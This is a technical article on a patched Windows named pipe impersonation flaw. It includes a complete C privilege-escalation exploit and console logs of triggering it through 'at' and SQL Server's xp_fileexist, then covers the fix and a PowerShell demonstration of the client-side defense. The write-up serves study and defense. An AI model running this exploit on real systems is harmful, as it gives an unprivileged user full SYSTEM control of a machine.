Windows Named Pipes Exploitation

zhaozj, 2021-02-16

All current versions of the Microsoft Windows family of operating systems are based on the Windows NT kernel. This has a positive impact on both the remote and the local security of the Windows world. There are still some weak spots, though, that allow obtaining LocalSystem privileges on the local computer, which means full system compromise. Usually the cause is a buffer overrun on the stack or heap in a system service, as in any operating system. However, we should not forget about system-specific bugs caused by unexpected behavior of system functions. This kind of bug is very system dependent and is discovered from time to time in different operating systems. Of course, Windows is no exception.

System-specific bugs usually affect local users. Of course, this is not an axiom, but a local user has access to a far larger set of system API functions than a remote one. So we are talking about the possibility for a local user to escalate his privileges.

According to MSDN, to launch an application under a different account one must use the LogonUser() and CreateProcessAsUser() functions. LogonUser() requires the username and password of the account we need. CreateProcessAsUser() requires the caller to hold the SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME privileges. Only system processes normally have both of them; even the 'Administrator' account does not hold SE_ASSIGNPRIMARYTOKEN_NAME by default and so has no right to call CreateProcessAsUser(). So, to execute an application such as 'cmd.exe' under the LocalSystem account this way, we would have to be LocalSystem already. Since we have neither the username and password of a privileged user nor these privileges, we need another solution. In this paper we will obtain 'LocalSystem' privileges through the file access API. To open a file a Windows application calls the CreateFile() function, defined below:

HANDLE CreateFile (LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);

To open a file we call something like:

HANDLE hFile;
hFile = CreateFile(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

For an experienced Windows programmer it is clear that this function has more uses than opening ordinary files. It is used to open or create files, directories, physical drives, and various resources for interprocess communication, such as pipes and mailslots. We will be concerned with pipes. Anonymous pipes are used for one-way data exchange between parent and child processes. All read/write operations on them are almost identical to the same operations on files.

Named pipes are used for two-way data exchange between a client and a server, or between two client processes. Like anonymous pipes they behave like files, but they can also be used to exchange data over the network.

A named pipe creation example is shown below:

hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL);

A named pipe's name can vary, but it always has a predefined format. An example of a valid name is '\\.\pipe\getsys'. On Windows the '\\.\' prefix names the local device namespace and may precede any filename, e.g. 'C:\boot.ini' and '\\.\C:\boot.ini' refer to the same file. The same pipe can also be reached through the UNC form '\\computername\pipe\getsys', where computername is the local host or a remote one, and the Win32 layer accepts forward slashes in place of backslashes.

With this basic knowledge of named pipe operations we can suppose there is a way to make an application access a named pipe instead of a user-supplied file. For example, if we have created the named pipe "\\.\pipe\getsys" we can try to force the application to access "\\computername\pipe\getsys". This gives us a chance to manipulate the application's access token.

An impersonation token is an access token that carries the client's security context; that is, it lets a server do something on the client's behalf. In our case the server is the named pipe we created. This becomes possible because the client grants us the SecurityImpersonation level. More precisely, the impersonation level is chosen by the client: when a client opens the pipe with CreateFile() without SECURITY_SQOS_PRESENT in dwFlagsAndAttributes, the default is SecurityImpersonation. If the client application has LocalSystem privileges, we get access to the registry, to process and memory management, and to other capabilities not available to an ordinary user. This attack can easily be realized in practice. The attack scenario for this vulnerability is as follows:

1. Create the named pipe.

   Wait for a client to connect after the named pipe is created.

2. Impersonate the client.

   Because we assume the client is LocalSystem, we will have its privileges too.

3. Obtain the required rights. In fact we need only:

   - SE_ASSIGNPRIMARYTOKEN_NAME
   - SE_INCREASE_QUOTA_NAME
   - TOKEN_ALL_ACCESS
   - TOKEN_DUPLICATE

   This is all we need for the CreateProcessAsUser() function. To obtain these rights we need a new token opened with TOKEN_ALL_ACCESS, and we can get one because we now have the privileges of the client process.

4. Execute code of our choice.

   It could be registry access, setting hooks, or arbitrary commands with SYSTEM privileges. The last one is the most interesting, because we can execute a standalone application of our choice for our specific needs.

As was said before, I can now execute CreateProcessAsUser() with SYSTEM privileges. I am back at the beginning, but this time I have all the required privileges and 'LocalSystem' is under my thumb.


#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    char szPipe[64];
    HANDLE hPipe, hToken, hToken2;
    SECURITY_ATTRIBUTES sa;
    PSECURITY_DESCRIPTOR pSD = NULL;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    char szUser[256];
    DWORD dwSize = sizeof(szUser);

    if (argc != 2) {
        fprintf(stderr, "usage: %s <program>\n", argv[0]);
        return 1;
    }

    sprintf(szPipe, "\\\\.\\pipe\\getsys");

    // Create the named pipe "\\.\pipe\getsys"; we are its server
    hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
                            2, 0, 0, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create named pipe:\n%s\n", szPipe);
        return 2;
    }
    printf("Created named pipe: %s\n", szPipe);

    // Security descriptor with a NULL DACL (everyone gets full access). It is
    // applied to the duplicated token and the new process so we can reach them
    pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH);
    InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorDacl(pSD, TRUE, NULL, FALSE);
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = pSD;
    sa.bInheritHandle = FALSE;

    printf("Waiting for connection...\n");
    // Block until a client (hopefully a LocalSystem service) opens the pipe
    ConnectNamedPipe(hPipe, NULL);

    printf("Impersonate...\n");
    // Take the client's security context. A client that opened the pipe without
    // SECURITY_SQOS_PRESENT grants SecurityImpersonation level by default
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate the named pipe client, GetLastError: %u\n", GetLastError());
        CloseHandle(hPipe);
        return 3;
    }
    printf("Open thread token...\n");

    // Open our own thread's impersonation token with TOKEN_ALL_ACCESS
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
        printf("OpenThreadToken failed, GetLastError: %u\n", GetLastError());
        RevertToSelf();
        CloseHandle(hPipe);
        return 4;
    }
    printf("Duplicating token...\n");

    // Turn the impersonation token into a primary token for CreateProcessAsUser()
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation,
                          TokenPrimary, &hToken2)) {
        printf("Error in DuplicateTokenEx, GetLastError: %u\n", GetLastError());
        RevertToSelf();
        CloseHandle(hToken);
        CloseHandle(hPipe);
        return 5;
    }

    // Report whose context the thread now runs in (it is still impersonating)
    GetUserName(szUser, &dwSize);
    printf("Impersonating: %s\n", szUser);

    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(si);
    si.lpDesktop = NULL;
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;

    printf("Creating new process %s\n", argv[1]);

    // Create the new process with the client's primary token. This succeeds because
    // the impersonating thread carries the client's SE_ASSIGNPRIMARYTOKEN_NAME and
    // SE_INCREASE_QUOTA_NAME privileges
    if (!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, &sa, TRUE,
                             NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
                             NULL, NULL, &si, &pi)) {
        printf("CreateProcessAsUser failed, GetLastError: %u\n", GetLastError());
        RevertToSelf();
        CloseHandle(hToken2);
        CloseHandle(hToken);
        CloseHandle(hPipe);
        return 6;
    }

    // Wait for the process to complete, then clean up and exit
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    RevertToSelf();
    CloseHandle(hToken2);
    CloseHandle(hToken);
    CloseHandle(hPipe);
    return 0;
}

This vulnerability gives us a chance to obtain SYSTEM privileges on the local computer. The only condition is that a system process must open our pipe as a client. This condition is easy to reproduce with system services. For example:

[shell 1]

> pipe cmd.exe
Created named pipe: \\.\pipe\getsys
Waiting for connection...

[shell 2]

> time /t
18:15

> at 18:16 /interactive \\computername\pipe\getsys
New task added with code 1

[shell 1]

Impersonate...
Open thread token...
Duplicating token...
Impersonating: SYSTEM
Creating new process cmd.exe

Now we have a new instance of cmd.exe with SYSTEM privileges, so a user can easily obtain the privileges of LocalSystem. Of course, reproducing this situation is easy only when there is a service that accesses files at a user's request. Because the 'at' command requires elevated privileges (at least Power User) and can be used to launch cmd.exe directly without any named pipe, this particular example is of little practical use.

In practice, this vulnerability may be exploited for privilege escalation by a local user if Microsoft SQL Server is installed. SQL Server runs with SYSTEM privileges and can be accessed by an unprivileged user. @stake reported a vulnerability in the xp_fileexist extended stored procedure [4]. This procedure checks whether a file exists, and we can use it to make the server access our named pipe. The attack scenario is nearly the same:

[shell 1]

> pipe cmd.exe
Created named pipe: \\.\pipe\getsys
Waiting for connection...

[shell 2]

C:\> isql -U user
Password:
1> xp_fileexist '\\computername\pipe\getsys'
2> go
File Exists  File is a Directory  Parent Directory Exists
-----------  -------------------  -----------------------
          1                    0                        1

[shell 1]

Impersonate...
Open thread token...
Duplicating token...
Impersonating: SYSTEM
Creating new process cmd.exe

Finally, it is worth pointing out that this vulnerability exists in Windows NT/2000/XP and is fixed in Windows 2000 SP4 and in Windows Server 2003 (and later in Windows XP SP2). The fix is the new "Impersonate a client after authentication" privilege (SeImpersonatePrivilege) described in [1]: by default only Administrators, services and LocalSystem hold it, so a process running as an ordinary user can no longer impersonate a pipe client at all.
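The mechanism the exploit depends on, and the client-side control that blunts it even on an unpatched system, shown as an added example (this is not code from the original paper or its author). The script uses .NET's System.IO.Pipes classes, which wrap CreateNamedPipe, CreateFile and ImpersonateNamedPipeClient; the pipe name 'getsys-demo' and the function name are assumptions. Both ends run in one process as the same user, so the server "impersonates" ourselves, but the level of the token it obtains differs: a client that opens the pipe with SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION (TokenImpersonationLevel.Identification here) still tells the server who connected, yet the server cannot turn that token into a primary token, so step 3 of the scenario fails.

```powershell
# Added example, not from the original paper. Requires Windows PowerShell 5.1
# or later. The pipe name is an arbitrary assumption; any unused name works.
$pipeName = 'getsys-demo'

function Test-PipeImpersonation {
    param(
        # The impersonation level the *client* allows the server to obtain.
        [Parameter(Mandatory)]
        [System.Security.Principal.TokenImpersonationLevel]$Level
    )

    # Server side: the equivalent of CreateNamedPipe() in the exploit.
    $server = [System.IO.Pipes.NamedPipeServerStream]::new(
        $pipeName,
        [System.IO.Pipes.PipeDirection]::InOut,
        1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte,
        [System.IO.Pipes.PipeOptions]::Asynchronous)
    try {
        # ConnectNamedPipe(), but asynchronous so the client can run in this thread.
        $accept = $server.WaitForConnectionAsync()

        # Client side: the victim's CreateFile(). The last argument becomes
        # SECURITY_SQOS_PRESENT | <level>. A Win32 client that passes no SQOS
        # flags gets SecurityImpersonation, which is what the exploit relies on.
        $client = [System.IO.Pipes.NamedPipeClientStream]::new(
            '.', $pipeName,
            [System.IO.Pipes.PipeDirection]::InOut,
            [System.IO.Pipes.PipeOptions]::None,
            $Level)
        $client.Connect(5000)
        $accept.Wait()

        $result = [pscustomobject]@{
            Requested  = $Level
            ClientName = $server.GetImpersonationUserName()  # who connected
            TokenLevel = $null                               # what we may do as them
        }

        # ImpersonateNamedPipeClient() + inspection of the thread token, then
        # RevertToSelf() when the worker returns.
        $worker = {
            $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
            $result.TokenLevel = $id.ImpersonationLevel
        }.GetNewClosure()
        $server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]$worker)

        $client.Dispose()
        return $result
    }
    finally {
        $server.Dispose()
    }
}

# Default-style client: TokenLevel is Impersonation, so a server could
# duplicate the token to a primary token and call CreateProcessAsUser().
Test-PipeImpersonation -Level Impersonation

# Hardened client: TokenLevel is Identification. The server still learns the
# client name, but DuplicateTokenEx(..., TokenPrimary, ...) and any access to
# securable objects on the client's behalf fail with ERROR_BAD_IMPERSONATION_LEVEL.
Test-PipeImpersonation -Level Identification
```

A native service that must open user-supplied paths gets the same protection by passing SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION (or SECURITY_ANONYMOUS) in the dwFlagsAndAttributes argument of CreateFile(); it can additionally reject any handle for which GetFileType() does not return FILE_TYPE_DISK, which catches the case where the "file" turned out to be a pipe.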

A big thanks to Zaraza (www.security.nnov.ru); without him nothing would have been possible.

[1] Overview of the "Impersonate a Client After Authentication" setting (Microsoft Knowledge Base article 821546): http://support.microsoft.com/default.aspx?scid=kb;[LN];821546

[2] Exploit by Maceo: http://www.securityfocus.com/archive/1/74523

[3] Exploit by wirepair: http://www.securityfocus.com/archive/1/329197

[4] Named Pipe Filename Local Privilege Escalation (@stake advisory): www.atstake.com/research/advisories/2003/a070803-1.txt

[5] Service Pack 4 for Windows 2000: http://download.microsoft.com/download/b/1/a/b1a2a4df-cc8e-454b-ad9f-378143d77aeb/sp4EXPRESS_EN.EXE
